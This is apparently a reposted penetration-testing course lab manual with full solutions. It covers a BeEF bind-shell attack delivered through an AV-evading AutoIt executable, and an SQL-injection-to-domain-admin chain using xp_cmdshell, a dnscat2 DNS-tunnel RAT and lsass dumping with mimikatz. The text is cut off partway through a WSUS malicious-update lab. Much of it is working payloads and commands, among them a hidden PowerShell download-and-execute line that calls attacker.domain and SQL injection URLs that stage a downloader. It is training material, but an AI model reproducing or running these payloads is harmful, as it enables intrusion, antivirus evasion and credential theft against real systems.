Armed with the skills acquired though the task

you can achieve the lab goal.

If this is the first time you do this lab, we

advise you to follow these tasks.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Once you have completed all the tasks, you can

proceed to the end of this paper and check the
solutions

Recommended tools

● [BeEF] and its [bind shellcode]

● Reflection techniques (PowerShell) and

● [AutoIt] (to automate most of the attack's

steps and put everything in a single attack
vector)

Network Configuration & Credentials

You can use the 10.100.12.5 machine to download
the executable you will create and simulate the
victim.

Credentials:

● ELS_Admin
● P@ssw0rd123

You can connect to 10.100.12.5 through Remote

Desktop (rdesktop command if you are using Linux)

Tasks
Task 1: Work with Metasploit on the BeeF bind stager
and create an A/V resistant payload

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The first step of this lab is to copy BeEF's bind

shellcode modules from
/beef/modules/exploits/beefbind/shellcode_source
s/msf to the appropriate Metasploit folders (on
kali rolling you can find the Metasploit folders
on /usr/share/Metasploit-framework/...). This
way you can use the Metasploit framework to not
only generate BeEF bind shellcode stagers in
multiple formats but also for re-encoding or
removing bad characters.

Now, that BeEF's bind shellcode modules are

inside Metasploit, you can create stagers in
multiple formats, using numerous ways of
encoding. In the solutions part, we chose to use
PowerShell and reflection in order to minimize
the on-disk footprint (psh-reflection format).
Give it a try...

Note: We used MSF4 for this lab. MSF5 may require

slightly different steps and it doesn't include
the psh-reflection format. That being said MSF5
is still a viable framework for the lab's tasks.

Task 2: Automate the attack and put everything in a

single attack vector

Taking into consideration the attack's

requirements, you have to find a way to automate
as many steps as possible and put everything into
a single attack vector.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Be reminded that you have to perform the

following:

1. Make the victim run an executable

(undetected by AVs)

2. Spawn a hidden Firefox browser, opening a

page with BeEF's hook underneath

3. Inject BeEF's bind shellcode using

PowerShell and reflection

HINT: Take a look at the capabilities provided by

[AutoIt] ...

Task 3: Modify BeEF's Eudora Mail 3 exploit and execute

the attack

1. Modify BeEF's Eudora Mail 3 exploit so you

can manually send the attack's stage payload
on port 4444 that the stager bound
2. Send the AutoIt-derived executable you
created in Task 2 to your target
3. Once the custom AutoIt-derived executable
is executed, send the attack's stage payload
4. Execute commands and receive the results
through the target's browser

Note: Remember that you can use the 10.100.12.5

machine to download and execute the executable
you created (simulating the attack).

Credentials:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● ELS_Admin
● P@ssw0rd123

Solutions
Below, you can find solutions for each task.
Remember though that you can follow your own
strategy (which may be different from the one
explained in the following lab).

Task 1: Work with Metasploit on the BeeF bind stager

and create an A/V resistant payload

To do this, all you have to do is follow the

instructions placed in
/beef/modules/exploits/beefbind/shellcode_source
s/msf/instructions.txt

With BeEF bind shellcode modules inside

Metasploit, you can use msfvenom to create the
attack's stager.

By executing the following command, you will

create a PowerShell based BeEF bind shellcode
stager, which is also A/V resistant since it
leverages .NET's reflection capability.
psh-reflection format leverages .NET's
reflection, so there is no need for a temporary
.cs file to be dropped for dynamic compilation.

>> msfvenom -a x86 --platform windows -p

windows/beef_shell/beef_bind -f
psh-reflection -o outfile.ps1

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Task 2: Automate the attack and put everything in a

single attack vector

To automate the majority of the attack's

requirements, you can leverage AutoIt. AutoIt is
a freeware BASIC-like scripting language designed
for automating the Windows GUI and general
scripting. Once you install AutoIt, open a
notepad and write the following AutoIt script.
Then, save it as a .au3 file. Finally, right
click on it and select "Compile Script (x86)".

$path = "C:\Program Files (x86)\Firefox

Developer Edition\"
$path1 =
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\"
ShellExecute($path & "firefox.exe",
"https://attacker.domain/beef.html", "", "",
@SW_HIDE)
WinWait("[TITLE:Firefox Developer Edition]")
WinSetState ("[LAST]", "", @SW_HIDE)
ShellExecute($path1 & "powershell.exe", "-ep
Bypass -W Hidden -c """"(new-object
Net.WebClient).DownloadString('https://attack
er.domain/metasploit_stager.ps1') | iex""""",
"", "", @SW_HIDE)

The AutoIt script above performs the following:

1. Targets Firefox Developer Edition. On $path

you should enter the Firefox's path.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

2. Uses the 32bit version of PowerShell

($path1).

3. Spawns a Firefox browser and loads a web

page using ShellExecute. Once Firefox is
spawned, it is hidden in the background via
the WinWait and WinSetState commands.
Actually, those two commands instruct the
target's computer that "whenever a window
comes up with the title "Firefox Developer
Edition" (the default title of Firefox
Developer Edition), put it in the background
and keep it running".

4. PowerShell is called using ShellExecute and

the stager you created in Task 1 is loaded
and executed in the target's memory.

You can find the source code on the following

link.
https://gist.github.com/anonymous/09f10cdb5d9b0ba
e4755850273083fd2

Task 3: Modify BeEF's Eudora Mail 3 exploit and execute

the attack

1. First, modify BeEF's Eudora Mail 3 exploit

so you can manually send the attack's stage
payload on port 4444 that the stager bound.

Navigate to:
/beef/modules/exploits/beefbind/beef_bind_exploi

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

ts/eudora_mail_beef_bind/ and replace command.js

with the following version of command.js.
https://gist.github.com/anonymous/a1befcd2a0acf8f
ed62aa854e05e0d88

The altered command.js above simply skips the

if(stager_successfull) check of the original
version and enables us to manually send the
attack's stage payload. This will still work,
since our own version of the attack's stager will
make the target able to receive the stage
payload. Be reminded that our attack lifecycle
does not have any specific software or browser
extension requirements.

1. Now, send the AutoIt-derived executable you

created in Task 2 to your target. For this
lab's context you can RDP into the target
machine ("rdesktop 10.100.12.5", credentials:
ELS_Admin/P@ssw0rd123) and download the
executable you created, from your attacking
machine.

2. Once the target executes the AutoIt-derived

executable, port 4444 will be bound on his
machine and a hidden browser will load a web
page with BeEF underneath. So, to send the
attack's stage payload using BeEF perform the
following:

3. Select the hooked browser and click on the

Commands tab. Then on the Module Tree, click

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Exploits, BeEF_bind and Eudora Mail 3. On the

Target Host, enter the target's internal IP
(you can identify it using the two Get
Internal IP modules of BeEF). On BeEF Host
enter BeEF's IP, if you are delivering an
internal penetration test, or the web page's
domain name, if you are delivering an
external penetration test. Also change BeEF's
port if you have changed it through the
config.yaml. Finally, click Execute. This
will send the attack's stage payload on the
target's 4444 port.

● To send commands for execution on the target

machine, on the Module Tree, click Exploits,
BeEF_bind and BeEF bind shell. On Target Host
enter the target's internal IP and on

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Command, enter the command you want to be

executed and have its results returned
through the target's browser. Finally, on
BeEF Bind Shellcode choose Windows and click
Execute

Congrats! You established a stealthy shell

through your target's browser!

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

From SQL injection to Domain

Administrator's hash LAB 4
Scenario
In the following lab, you can practice the
attacks against critical network infrastructure
that were explained in the Penetration Testing
eXtreme course.

You are engaged in an external network

penetration test. Your goal is to stealthily
capture the Domain Administrator's password hash
through the internet facing Web App 1, leveraging
weak SQL Server and database configurations as
well as legitimate SQL Server capabilities. No
PowerShell, Metasploit or PowerShell Empire
should be involved.

Scope of Engagement: NETBLOCK: 10.100.10.0/24

What we actually want to achieve is the

following.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Goals
Stealthily capture a Domain Administrator's
password hash through the internet facing Web App
1, leveraging weak SQL Server and database
configurations as well as legitimate SQL Server
capabilities. No PowerShell, Metasploit or
PowerShell Empire should be involved.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Identify a SQL injection vulnerability in Web

App 1.

● Escalate your privileges on the MS SQL Server

leveraging insufficiently secure SQL Server
configurations (check for insecure
impersonation).

● Find a way to stealthily transfer and execute

a DNS RAT to the MS SQL Server machine.

● Identify any Domain Administrator password

hashes on the MS SQL Server machine by
uploading and executing ProcDump, downloading
the lsass dump file and running mimikatz
locally against the downloaded dump file.

What you will learn

During the lab, you will learn how you can
leverage SQL injection vulnerabilities,
insufficiently secure SQL Server configurations
and SQL Server capabilities to capture a Domain
Administrator's password hash, while attacking
externally. You will also learn how to stealthily
transfer malicious scripts using SQL Server
capabilities. Finally, you will see how you can
acquire a shell and exfiltrate data through a DNS
tunnel.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Specifically, you will learn the following:

● Identifying insecure SQL Server

configurations (impersonation) through SQL
injection.

● Enabling advanced options and critical SQL

Server procedures through SQL injection.

● Privilege escalation (leveraging

impersonation) through SQL injection.

● Stealthily transferring malicious/scripts

payloads to SQL Server hosts.

● Establishing a shell and exfiltrating data

through a DNS tunnel.

● Using ProcDump and mimikatz to identify

privileged users' hashes, offline.

To guide you during the lab you will find

different Tasks.

Tasks are meant for educational purposes and to

show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Armed with the skills acquired though the task

you can achieve the Lab goal.

If this is the first time you do this lab, we

advise you to follow these Tasks.

Once you have completed all the Tasks, you can

proceed to the end of this paper and check the
solutions

Recommended tools

● [WScript]

● Visual Studio [2015]

● [dnscat2] (for acquiring a shell through a

DNS tunnel and stealthily exfiltrating data)

● [file2vbscript.py] by [Didier Stevens] (for

embedding a dnscat2 client in a VBscript)

● [ProcDump] & mimikatz (for dumping lsass

process to a file and extracting
credentials/hashes offline)

Tasks
Task 1: Identify a SQL injection vulnerability on Web App 1

The first step of this lab is to identify an SQL

injection vulnerability on Web App 1

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

(http://10.100.10.101/employee.asp?id=1). You are

advised to try and identify the SQL injection
vulnerability manually, to avoid setting off any
alarms. If you are unable to identify the SQL
injection vulnerability, you can use the
automated tool of your choice.

Task 2: Identify any insecure SQL Server configurations

(impersonation) and escalate your privileges

As covered in the Penetration Testing eXtreme

course, weak SQL Server configurations can lead
to privilege escalation. A commonly found weak
configuration is insecure usage of the
IMPERSONATION privilege. The IMPERSONATION
privilege is used to allow the impersonation of
other logins.

Try to identify if you can impersonate a

privileged user, through the SQL injection
vulnerability you discovered on Task 1.

Task 3: Stealthily transfer a DNS RAT to the MS SQL Server

machine

By now, you should be able to perform OS command

execution against the MS SQL Server machine,
using the escalated privileges you acquired on
Task 2. To stealthily transfer dnscat2's client
to the MS SQL Server machine, you can do the
following.

1. Download dnscat2 and open

/client/win32/dnscat2.vcproj using Visual

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Studio. Then, hardcode your attacking

machine's IP in the following line of
dnscat.c
https://github.com/iagox86/dnscat2/blob/maste
r/client/dnscat.c#L414 and add FreeConsole();
right above the following line
https://github.com/iagox86/dnscat2/blob/maste
r/client/dnscat.c#L356. Now, build the
solution.

2. Embed dnscat2's client into a VBS file

using file2vbscript.py.

3. Using echo commands, transfer a custom

script file that will download the VBS
payload above (this script file will be
executed through WScript). You could also use
echo commands and Burp Suite to transfer the
VBS payload directly, without any downloader
script.

4. Once the VBS file containing dnscat2's

client is fetched, execute it, again through
Wscript.

NOTE: In this lab's context, your attacking

machine will not act as the authoritative
nameserver of a subdomain. dnscat2 client will
make a direct UDP connection to your machine. If
you try dnscat2 on an engagement, make your

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

machine act as an authoritative nameserver, since

chances are that direct UDP connections won't be
allowed.

Task 4: Identify any Domain Administrator password hashes on

MS SQL Server machine

Luckily enough, you will acquire a shell (through

a DNS tunnel) with SYSTEM privileges. This is due
to the fact SQL Server services happened to run
as LocalSystem. In order to not set off any
alarms you are advised to avoid mimikatz. You can
upload ProcDump and run it against lsass. You can
then download the lsass dump file and run
mimikatz against it offline, on a box you own.

NOTE: The box that you will run mimikatz, against

the downloaded lsass dump file, must be running
the same OS as the one being run by the machine
you compromised.

Solutions
Below, you can find solutions for each task.
Remember though that you can follow your own
strategy (which may be different from the one
explained in the following lab).

Task 1: Identify a SQL injection vulnerability on Web App 1

Web App 1 contains employee information. What you

would normally see while browsing to
http://10.100.10.101/employee.asp?id=1 is the
following.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Web App 1 suffers from an SQL injection

vulnerability. To identify it, execute the
following request.

http://10.100.10.101/employee.asp?id=1 or 1=1--

Web App 1 will return all employee information.

To identify the number of columns in the query

being used, execute the following incrementally,
until an error is displayed. This knowledge is
required for a union select injection that will
be executed later on.

http://10.100.10.101/employee.asp?id=1 order by
1--

You will identify that an error is displayed when

the following request is issued.

http://10.100.10.101/employee.asp?id=1 order by
17--

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Consequently, there are 16 columns in the query.

Finally, to identify the SQL backend, you can

execute the following.

http://10.100.10.101/employee.asp?id=1 union
select null,null,'Version: '%2bcast((select
@@version) as
varchar),null,null,null,null,null,null,null,null,
null,null,null,null,null --

Task 2: Identify any insecure SQL Server configurations

(impersonation) and escalate your privileges

Insecure usage of the IMPERSONATION privilege is

very common. To identify if you can impersonate
any privileged logins. Issue the following
request.

http://10.100.10.101/employee.asp?id=1 union
select null,null,'Impersonate : '%2bcast((SELECT
distinct b.name) as
varchar),null,null,null,null,null,null,null,null,
null,null,null,null,null FROM
sys.server_permissions a INNER JOIN
sys.server_principals b ON a.grantor_principal_id
= b.principal_id WHERE a.permission_name =
'IMPERSONATE'--

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The FROM - IMPERSONATE part, is the actual query

you would execute to identify which SQL logins
you can impersonate.

You will see that you can impersonate the 'sa'

login!

With 'sa' level privileges, you can now perform

OS command execution against the MS SQL Server
machine, using numerous techniques. xp_cmdshell,
SQL Server Agent jobs and OLE Automation
Procedures are some viable solutions for OS
command execution. Be reminded that xp_cmdshell
may be closely monitored. SQL Server Agent jobs
and OLE Automation Procedures are stealthier, but
for the sake of simplicity, let's proceed with
xp_cmdshell.

NOTE: You could execute the OS commands below

using SQL Server Agent jobs or OLE Automation
Procedures as well.

To enable xp_cmdshell, SQL Server Agent jobs or

OLE Automation Procedures you will have to enable
SQL Server's advanced options first. You can do
this by issuing the following requests.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 EXEC
sp_configure 'show advanced options',1
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1
reconfigure

EXECUTE AS LOGIN = 'sa' is used to execute the

next query impersonating the 'sa' login.

To enable the actual xp_cmdshell procedure, issue

the following requests.

http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 EXEC
sp_configure 'xp_cmdshell',1
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1
reconfigure

Now, you are able to execute OS commands against

the MS SQL Server machine, through the
xp_cmdshell procedure.

Task 3: Stealthily transfer a DNS RAT to the MS SQL Server

machine

Taking into consideration that PowerShell may be

closely monitored and Metasploit's/PowerShell

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Empire's traffic is known to security solutions,

try to avoid them.

Transferring dnscat2's client executable may set

off an alert, in a security solution at the
perimeter of the organization. So, the first
thing to do is utilize file2vbscript.py to embed
dnscat2's client executable to a VBS file. This
VBS file will actually assemble and drop the
executable.

To obfuscate things more, remove the .vbs

extension from the file and host it in a server
under your control.

Then, in order to transfer this VBS file to the

MS SQL Server machine, you can do the following.

1. Use echo commands to transfer, line by

line, a script that will download the VBS
file, with dnscat2's client embedded and
execute it through WScript. (dnscat2's client
is saved as out.bin at c:\Windows\Temp)

You can do this by issuing the following

requests.

http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo var WinHttpReq = new
ActiveXObject("WinHttp.WinHttpRequest.5.1"); >
c:\Windows\Temp\dl.js'

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo WinHttpReq.Open("GET",
WScript.Arguments(0), /*async=*/false); >>
c:\Windows\Temp\dl.js'
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo WinHttpReq.Send(); >>
c:\Windows\Temp\dl.js'
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo BinStream = new
ActiveXObject("ADODB.Stream"); >>
c:\Windows\Temp\dl.js'
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo BinStream.Type = 1; >>
c:\Windows\Temp\dl.js'
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo BinStream.Open(); >>
c:\Windows\Temp\dl.js'
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

BinStream.Write(WinHttpReq.ResponseBody); >>
c:\Windows\Temp\dl.js'
http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'echo
BinStream.SaveToFile("c:\\Windows\\Temp\\out.bin"
); >> c:\Windows\Temp\dl.js'

You can find dl.js (the script that will download

the VBS file) in the following link.

[https://gist.github.com/anonymous/91296a84d59e5d
398c10c0a6d3519a0a]

To download the VBS file into the MS SQL Server

machine, issue the following requests.

http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'WScript/nologo c:\Windows\Temp\dl.js
url_of_the_vbs_file'

1. Once the VBS file is downloaded, rename it,

since it was downloaded as out.bin. You can
do this by issuing the following requests.

http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'rename c:\Windows\Temp\out.bin
out.vbs'

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

1. Finally, to execute dnscat2's client

(out.vbs), issue the following requests.

http://10.100.10.101/employee.asp?id=1 EXECUTE AS
LOGIN = 'sa'
http://10.100.10.101/employee.asp?id=1 exec
xp_cmdshell 'WScript/nologo
c:\Windows\Temp\out.vbs'

A connection should be established, through a DNS

tunnel, between the MS SQL Server and your
machine. This is what you should see on your
attacking machine.

Task 4: Identify any Domain Administrator password hashes on

MS SQL Server machine

Now, to execute OS commands through the DNS

tunnel execute the following.

dnscat2> window -i 1
command (els-DB) 1> shell

You should see something similar to the

following.

Then, execute the following.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

command (els-DB) 1> window -i 2

You will be presented with a command shell, with

SYSTEM privileges. It seems SQL Server services
run as LocalSystem.

NOTE: To go back press Ctrl + z and execute

window -i 1 again.

As we covered in the course, mimikatz is not the

only way to extract Administrator hashes from
memory.

You can also upload ProcDump to the MS SQL Server

machine through the DNS tunnel and execute it
against lsass. Then, you can download the lsass
dump file in a machine similar to MS SQL Server
and run mimikatz against the dump file there.

You can do this by executing the following:

command (els-DB) 1> upload

/Proc_Dump_path/procdump64.exe
c:/Windows/Temp/procdump64.exe
command (els-DB) 1> window -i 2
cmd.exe (els-DB) 2>
c:\Windows\Temp\procdump64.exe -accepteula -ma
lsass.exe c:\Windows\Temp\lsassdump.dmp

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Be aware that the uploading procedure may take 10

minutes+ to finish!

You should see something similar to the

following.

Finally, to download the lsass dump file

(lsassdump.dmp) through the DNS tunnel execute
the following.

Ctrl + z
dnscat2> window -i 1
command (els-DB) 1> download
c:/Windows/Temp/lsassdump.dmp
/root/Desktop/lsassdump.dmp

Be reminded that mimikatz should be run against

the lsass dump file, on a machine similar to the
MS SQL Server machine (Microsoft Windows Server
2012 R2 Standard)

So, in a Microsoft Windows Server 2012 R2

Standard put lsassdump.dmp into mimikatz's folder
and execute mimikatz. Then execute the following.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

mimikatz # sekurlsa::minidump lsassdump.dmp

mimikatz # sekurlsa::logonPasswords

Since downloading 30+MB through DNS is going to

take a long time, you can simulate the
abovementioned mimikatz actions against the
lsassdump.dmp inside the 10.100.10.101 machine.

● RDP into the 10.100.10.101 machine

(credentials: ELS\employee1:P@ssw0rd123)

● Inside the Downloads file we have placed

mimikatz and the lsassdump.dmp

● Run mimikatz as an Administrator and execute

the commands above.

As already mentioned, this is what you would do

on another Windows Server 2012 R2 box after you
downloaded lsassdump.dmp, not inside the targeted
machine.

Luckily, a Domain Administrator's password hash

will be extracted.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

NOTE: During an engagement, you may not be able

to identify a privileged user's password hash on
first run. If this is the case, you can always
create a scheduled task that will repeat the
procedure for you.

Serving a malicious update

through WSUS LAB 3
Scenario
In this lab, you can practice attacks against
critical network infrastructure that were
explained in the Penetration Testing eXtreme
course.

You are engaged in an internal network

penetration test. Your goal is to compromise a

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Windows 7 machine (10.100.11.101) through a

Windows 10 machine (10.100.11.100), leveraging
weak network configurations and legitimate
Windows functionality.

What we actually want to achieve is the

following:

Goals

● Compromise the lab's Windows 7 machine

through the lab's Windows 10 machine,
leveraging weak network configurations and
legitimate Windows functionality.

○ Compromise the lab's Windows 10 machine

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

○ Identify any weak proxy setting and

Windows Update configurations

○ Escalate privileges on the Windows 10

machine

○ Leverage the weak network and Windows

Update configurations, through the
privileged shell you established on the
Windows 10 machine

What you will learn

During the lab, you will learn alternative and
obscure ways to compromise a target. No
